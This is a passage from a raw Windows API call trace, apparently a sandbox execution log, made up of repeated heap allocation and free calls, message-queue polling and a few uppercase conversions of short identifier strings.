lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0089.397] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff8 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.397] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0089.397] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0089.397] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0089.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0089.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0089.398] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0089.398] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0089.398] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0089.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0089.399] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0089.399] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0089.399] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0089.399] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0089.399] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0089.400] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0089.400] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0089.400] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0089.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0089.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0089.402] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0089.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0089.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0089.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0089.403] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0089.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0089.403] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0089.403] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0089.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0089.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0089.403] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0089.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0089.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0089.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 